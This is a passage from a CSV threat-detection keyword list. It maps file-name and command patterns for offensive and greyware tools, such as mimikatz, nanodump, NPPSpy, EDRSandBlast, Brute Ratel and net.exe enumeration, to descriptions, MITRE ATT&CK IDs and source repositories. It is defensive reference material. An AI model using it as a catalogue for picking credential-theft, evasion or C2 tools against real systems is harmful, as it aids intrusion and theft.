Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,,N/A,,, -*\megatools.exe*,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,,N/A,,, -*\mem_dll.pdb*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\mhydeath64*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,0,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*\mimi32.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*\mimi64.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*\Mockingjay_BOF.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,0,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*\modifiableautorun.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*\monkey.exe *,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,0,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*\monkey32.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*\monkey64.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*\Mshikaki.cpp*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,0,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -*\MSOL\DomainCompanyInfo.txt*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,0,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*\mystikal.py*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,0,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*\nanodump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*\net*\ftpagent.exe*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,0,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -"*\net.exe"" accounts*",greyware_tool_keyword,net,Enumerate local accounts,T1087.001 - T1003,TA0007 - TA0009,N/A,N/A,discovery,https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\net.exe* localgroup admin*,greyware_tool_keyword,net,showing users in a privileged group. ,T1069 - T1003,TA0007 - TA0040,N/A,N/A,Discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,10,N/A,N/A,N/A,N/A -*\net.exe* sessions*,greyware_tool_keyword,net,List active SMB session,T1135 - T1047,TA0007 - TA0009,N/A,N/A,Discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,10,N/A,N/A,N/A,N/A -*\net.exe* view */domain*,greyware_tool_keyword,net,display all domain names on the network,T1016 - T1046,TA0007 - TA0009,N/A,N/A,Discovery,N/A,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*\net1 sessions*,greyware_tool_keyword,net,List active SMB session,T1135 - T1047,TA0007 - TA0009,N/A,N/A,Discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,10,N/A,N/A,N/A,N/A -*\NetExec-main*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*\NetLoader.exe*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*\netscan.exe*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*\netscan.exe*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\netscan.lic*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*\netscan.xml*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*\netscan_linux.tar.gz*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\netscan_portable.zip*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\netscan_portable\*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\netscan_setup.exe*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\NewPhish.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\NimBlackout*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*\NimPlant.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*\Ninja.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*\nmap.exe*/24*,greyware_tool_keyword,nmap,When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.,T1046 - T1065 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\Nofault.exe*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*\NoFilter.cpp*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,0,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*\NoFilter.exe*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,0,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*\NoFilter.sln*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,0,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*\NoFilter.vcxproj*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*\nopac.exe*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*\NoPowerShell*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*\NoPowerShell.*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*\No-PowerShell.cs*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,0,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\No-PowerShell.exe*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,0,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\NPPSpy.c*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\NPPSPY.dll*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\NPPSpy.exe*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\NPPSpy.txt*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\ntdlll-unhooking-collection*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,0,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*\ntdlol.txt*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*\ntlm.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\NTLMRelay2Self*,offensive_tool_keyword,NTLMRelay2Self,An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).,T1078 - T1078.004 - T1557 - T1557.001 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/med0x2e/NTLMRelay2Self,1,0,N/A,10,4,349,45,2022-04-30T19:02:06Z,2022-04-30T10:05:02Z -*\ntlmutil.py*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,0,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z -*\NtoskrnlOffsets.csv*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*\NtRemoteLoad.sln*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*\NtRights\*,offensive_tool_keyword,NtRights,tool for adding privileges from the commandline,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/gtworek/PSBits/tree/master/NtRights,1,1,N/A,7,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\Nuages_Cli*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*\obfy-1.0.zip*,offensive_tool_keyword,obfy,A tiny C++ obfuscation framework,T1027 - T1064 - T1140,TA0005 - TA0042,N/A,N/A,Defense Evasion,https://github.com/fritzone/obfy,1,1,N/A,N/A,6,537,122,2020-06-10T13:28:32Z,2015-11-13T13:28:23Z -*\OffensiveCSharp\*,offensive_tool_keyword,OffensiveCSharp,Collection of Offensive C# Tooling,T1059.001 - T1055.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\out_pe.exe*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,0,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*\padre\pkg\exploit*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,0,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*\papacat.ps1*,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,0,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -*\papacat.zip*,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,0,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -*\ParsedMalleableData.txt*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*\password.lst*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*\Passwordfiles.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\PatchingAPI.cpp*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,0,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*\PatchingAPI.exe*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,0,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*\payloadtests.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*\PEASS-ng*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,0,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*\PerfExec.exe*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,0,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z -*\Persistence.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\Persistence.exe*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\pipe\brutepipe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\PipeViewer.exe*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z 